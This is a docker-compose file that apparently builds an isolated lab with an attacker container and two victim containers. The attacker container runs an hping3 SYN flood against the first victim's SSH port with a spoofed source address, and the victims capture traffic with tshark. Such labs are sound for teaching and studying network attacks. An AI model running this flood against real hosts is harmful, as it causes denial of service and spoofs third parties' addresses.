version: "3"
services:
  attacker:
    build:
      context: .
      args:
        - username=attacker
    tty: true
    container_name: attacker
    depends_on:
      - victim-1
      - victim-2
    networks:
      vpcbr:
        ipv4_address: 10.5.0.6
    # remove the --flood flag to wait for ACKs before sending new packets
    command: sudo hping3 10.5.0.7 -S -a 10.5.0.8 -p 22 --flood

  victim-1:
    build:
      context: .
      args:
        - username=victim_1
    tty: true
    container_name: victim_1
    networks:
      vpcbr:
        ipv4_address: 10.5.0.7
    entrypoint: ["/bin/bash","-c"]
    command:
      - |
        sudo service ssh start # start the ssh daemon so that port 22 is open
        sudo tshark -i eth0 -f tcp

  victim-2:
    build:
      context: .
      args:
        - username=victim_2
    tty: true
    container_name: victim_2
    networks:
      vpcbr:
        ipv4_address: 10.5.0.8
    entrypoint: ["/bin/bash","-c"]
    command:
      - |
        sudo service ssh start # start the ssh daemon so that port 22 is open
        sudo tshark -i eth0 -f tcp

networks:
  vpcbr:
    driver: bridge
    ipam:
     config:
       - subnet: 10.5.0.0/16
         gateway: 10.5.0.1
